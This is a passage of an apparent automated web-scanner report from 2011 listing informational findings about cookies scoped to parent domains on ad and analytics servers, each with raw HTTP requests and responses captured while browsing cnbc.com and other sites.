Set-Cookie: sessionstamp=21967169; expires=Tue, 06-Sep-2011 17:45:36 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rg
...[SNIP]...

12.4. http://pixel.everesttech.net/1688/i previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://pixel.everesttech.net
Path:	/1688/i

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

everest_session_v2=ts5OZjd7UQcAAI3@; path=/; domain=.everesttech.net
everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Wed, 11-Sep-2030 01:48:44 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1688/i?ev_sid=58&ev_ci=700032768&ev_ai=700644175&ev_cri=705923885&ev_pl HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:44 GMT
Server: Apache
Set-Cookie: everest_session_v2=ts5OZjd7UQcAAI3@; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Wed, 11-Sep-2030 01:48:44 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Vary: X-EF-Forwarded-For,Cookie,Host
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051142-80-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 128
Content-Type: image/png

.PNG
.
...IHDR.....................bKGD............. pHYs...........~.....tIME......).......IDATx.c````........E@....IEND.B`.

12.5. http://ttwbs.channelintelligence.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://ttwbs.channelintelligence.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sessionstamp=5F0620DE-F4C8-E4AD-F1CC-A22673796C99;Domain=.channelintelligence.com;Expires=Tue, 06-Sep-11 17:45:37 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?eid=203&oid=19483251&linkid=&uid=163810295&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D163810295%26nICnt%3D1%26nDCnt%3D8%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098978%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D13017277%5F841291%5F8679155%5F13016956%5F48968727%5F11302%5F86109971%5F26080384%26nRID%3D0%26sRnd%3DB96GjZc1 HTTP/1.1
Host: ttwbs.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: serverstamp=951ED21A%2D5742%2D4191%2DBC56%2D8856DB199D2C

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 16:45:37 GMT
Server: Jetty(6.1.22)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: sessionstamp=5F0620DE-F4C8-E4AD-F1CC-A22673796C99;Domain=.channelintelligence.com;Expires=Tue, 06-Sep-11 17:45:37 GMT
Cache-Control: private
Content-Length: 0
Location: http://content.links.channelintelligence.com/images/blank.gif?y=0
Via: 1.1 iad061102000000 (MII-APC/2.1)
Content-Type: text/plain

12.6. http://a.tribalfusion.com/displayAd.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/displayAd.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:02 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.4&th=37103964303 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Tue, 06 Sep 2011 14:59:02 GMT
Last-Modified: Sat, 20 Aug 2011 07:25:15 GMT
Expires: Mon, 05 Dec 2011 14:59:02 GMT
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:02 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 247
Connection: keep-alive

var e9Manager;
var e9;

if (e9 !== undefined)
{
if (e9.displayAdFlag !== undefined)
{
if (e9.displayAdFlag === true)
e9.displayAd();
}
else
e9Manager.displayAdFromE9(e9)
...[SNIP]...

12.7. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:45 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=271753&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 206
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:45 GMT;
Content-Type: text/html
Location: /z/i.cid?c=271753&d=30&page=landingPage
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

12.8. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:04 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=cnbc&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=300x250&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude&f=1&p=19075868&a=1&rnd=19083097 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:04 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 267
Expires: 0
Connection: keep-alive

document.write('<iframe src="http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250" width=300 height=250 marginwidth=0 marginh
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:05 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:05 GMT;
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 191
Expires: 0
Connection: keep-alive

<script type="text/javascript" language="JavaScript">
var img = new Image();
img.src = "http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-tribalfusion&cg=&cc=1&rnd=1228001246";
</script>

12.10. http://a.tribalfusion.com/z/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/z/i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:46 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.cid?c=271753&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:46 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

12.11. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1398295G52620110830164853&pub=IC13501&flash=10&time=2|14:57|-5&redir=http://a1.interclick.com/icaid/192677/tid/1ff795b7-a8cc-487d-bdd1-056be6aa440f/click.ic?$CTURL$&pos=x&dom=http://search.cnbc.com&r=0.07496926933526993 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=47AC0400-3F06-2A6D-020A-1BB000220100; PRca=|AKln*9320:2|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKlnAC0U:2|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FrlJ:2|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GW7X:2|GV2B:1|GV12:2|GSur:3|#; PRpc=|FrlJGW7X:2|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 14:57:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4496
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=47AC0400-C30A-57B3-020A-1BB000220100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKln*9320:4|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlnAC0U:4|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FrlJ:4|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GW7X:4|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FrlJGW7X:4|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

12.12. http://api.bizographics.com/v1/profile.redirect previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KV1QisJqhCw3Caj5XcunNcMDa7Re6IGD4lAPKWdnq4jBRAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtS8UYaNROq1hKa5pT7PlEtIEVUJBxdqAyA9AgipxBis0MPBYw4RisMnVT081fJFlZ0k4MipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315321124004408%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1
Host: api.bizographics.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Tue, 06 Sep 2011 15:00:30 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ei=21&ti=95&vi=11&sti=28&sei=0&sci=0&sai=0&smi=0&pbi=0&sts=1315321124004408&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8&industry=business_services&location=texas
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KV1QisJqhCw3Caj5XcunNcMDa7Re6IGD4lAPKWdnq4jBRAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtS8UYaNROq1hKa5pT7PlEtIEVUJBxdqAyA9AgipxBis0MPBYw4RisMnVT081fJFlZ0k4MipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive

12.13. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 14:56:57 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=1000004&c3=&c4=&c5=&c6=&c10=&c15=&c16=&r=&ns__t=1315339017162&ns_c=UTF-8&c8=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&c7=http%3A%2F%2Fwww.cnbc.com%2F&c9=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D(The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM)%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 06 Sep 2011 14:56:57 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 14:56:57 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

12.14. http://c.statcounter.com/t.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c.statcounter.com
Path:	/t.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323346.0; expires=Sun, 04-Sep-2016 15:35:46 GMT; path=/; domain=.statcounter.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /t.php?sc_project=3776433&resolution=1920&h=1200&camefrom=&u=http%3A//www.resourcepoint.net/&t=Resource%20Point%20%E2%80%93%20Experts%20in%20eCommerce%2C%20portal%20development%20%26%20content%20management&java=1&security=f2e27155&sc_random=0.36302077560685575&sc_snum=1&invisible=1 HTTP/1.1
Host: c.statcounter.com
Proxy-Connection: keep-alive
Referer: http://www.resourcepoint.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323346.0; expires=Sun, 04-Sep-2016 15:35:46 GMT; path=/; domain=.statcounter.com
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

12.15. http://clk.fetchback.com/serve/fb/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.fetchback.com
Path:	/serve/fb/click

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
cre=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
clk=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/click HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clk=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 17:06:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2

12.16. http://clk.fetchback.com/serve/fb/engmnt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.fetchback.com
Path:	/serve/fb/engmnt

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
eng=1_1315328782_20056:1658183; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/engmnt HTTP/1.1
Host: clk.fetchback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

